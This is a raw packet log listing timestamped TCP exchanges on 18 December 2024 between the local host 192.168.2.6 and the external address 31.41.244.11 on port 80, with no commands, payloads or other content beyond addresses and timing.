                                                                                                                                                                  Dec 18, 2024 11:09:30.820993900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.821151972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.821369886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.821475029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.821525097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.821583986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.821688890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.822386980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.822611094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.822902918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.822957039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.823360920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.823499918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.823525906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.823843002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.824366093 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.824443102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.824484110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.824484110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.825443983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.825457096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.825510979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.826291084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.826375961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.826384068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.826477051 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.827246904 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.827342033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.827370882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.827542067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.828248024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.828346968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.828375101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.828547001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.829632998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.829658031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.829863071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.830261946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.830321074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.830358028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.830358028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.831372976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.831384897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.831501007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.832341909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.832355976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.832402945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.833226919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.833308935 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.838660002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.838671923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.838684082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.838742971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.838742971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.838831902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.838922024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.840034962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.840046883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.840091944 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.840614080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.840749025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.840818882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.841574907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.841653109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.841778994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.842237949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.842683077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.842746973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.842780113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.842780113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.843588114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.843641043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.843676090 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.843822002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.844620943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.844633102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.844680071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.844680071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.845679045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.845690966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.845735073 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.846591949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.846604109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.846661091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.847518921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.847593069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.847630024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.847759008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.848455906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.848588943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.848607063 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.848680019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.849595070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.849765062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.849790096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.849891901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.850414038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.850670099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.850692987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.850811005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.851584911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.851597071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.851638079 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.852514029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.852559090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.852713108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.852886915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.853359938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.853414059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.853529930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.853662968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.854329109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.854460955 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.854505062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.854615927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.855370998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.855389118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.855431080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.855431080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.856307983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.856389046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.857042074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.857112885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.857273102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.857346058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.857525110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.857614994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.858294010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.858370066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.858392954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.858746052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.859277964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.859337091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.859360933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.859606028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.860287905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.860454082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.860490084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.860564947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.861392021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.861403942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.861450911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.861450911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.862284899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.862405062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.862514019 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.862739086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.863193989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.863325119 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.863353014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.863421917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.864209890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.864253998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.864274025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.864562988 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.865137100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.865212917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.865386009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.865433931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.866214991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.866369963 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.866393089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.866578102 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.867382050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.867393970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.867743015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.868269920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.868282080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.868628025 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.869146109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.869158030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.869479895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.870162964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.870174885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.870429039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.871248007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.871259928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.871305943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.871305943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.872108936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.872452021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.872476101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.872589111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.873095036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.873320103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.873428106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.873523951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.874075890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.874088049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.874243021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.875145912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.875159025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.875210047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.876113892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.876234055 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.876398087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.012684107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.012697935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.012711048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.012773991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.012773991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.013612032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.013628960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.013641119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.013703108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.013703108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.015512943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.015527010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.016513109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.016526937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.016539097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.016573906 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.016573906 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.016653061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.017184973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.017709970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.017723083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.017761946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.017817974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.018712997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.019362926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.019397020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.019397020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.020514965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.020525932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.020536900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.020556927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.020572901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.021565914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.021576881 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.021589041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.021606922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.021833897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.023469925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.023482084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.023495913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.023545980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.023545980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.024736881 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.024750948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.024801016 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.029923916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.029936075 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.029947996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.030035019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.030035019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.030915022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.030930042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.031120062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.031352043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.031394958 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.032058001 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.032071114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.032110929 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.033811092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.033826113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.033879042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.033940077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.034123898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.034250021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.035352945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.035365105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.035535097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.036659002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.036670923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.036773920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.037442923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.037453890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.037573099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.037982941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.037995100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.038034916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.038788080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.039383888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.039486885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.039885044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.039897919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.039973021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.041119099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.041130066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.041189909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.041189909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.042074919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.042087078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.042244911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.043168068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.043179989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.043301105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.044190884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.044203043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.044359922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.045531034 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.045542955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.046355963 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.046375990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.046387911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.046562910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.046607018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.046716928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.046936035 CET804991231.41.244.11192.168.2.6
